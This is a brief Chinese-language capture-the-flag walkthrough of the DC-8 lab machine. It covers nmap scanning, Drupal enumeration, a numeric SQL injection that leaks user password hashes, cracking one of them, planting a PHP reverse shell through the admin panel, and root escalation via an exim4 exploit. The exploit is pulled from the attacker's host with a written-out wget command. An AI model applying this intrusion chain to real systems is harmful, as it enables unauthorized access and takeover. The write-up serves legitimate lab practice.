DC-8靶机实战

DC-8靶机实战

nmap扫一下
主机发现

全扫描：

用drupal cms扫描器扫一下

7.67版本，卡得不上不下的，难搞喔
发现了存在php这个插件，如果能进到后台，执行一波php代码，反弹shell就好了

后面又是各种一顿扫，没有发现什么有用的，然后就去手动到网站找漏洞
后面遇到一个页面。以为有xml注入，结果尝试无果

最后找到了一个注入点

数字型注入，手工几下就拿到了users里面的admin 的口令和john 口令

john爆破了一下，admin的口令没有爆破出来，到是拿到john 口令

后台登录：

没有权限增加content，但能修改一个content


加入反弹shell代码，选择php code

然后到该页面填写提交，记得还是要填规范。不然报错也不会执行里面的反弹shell的

然后找提取的突破口

发现了exim4，看看版本

msf 精确搜索

选择本地权限提升的脚本
改成root.sh

看了一下内容，本地权限提升参数 -m netcat
kali打开http服务

下载到靶机
wget http://192.168.206.128:8000/root.sh
记得下载到可写目录

chmod +x root.sh
执行

出现了这个问题，脚本必须设置成unix

vim打开。set ff=unix
然后保存退出，再下载
执行

提权成功

读取flag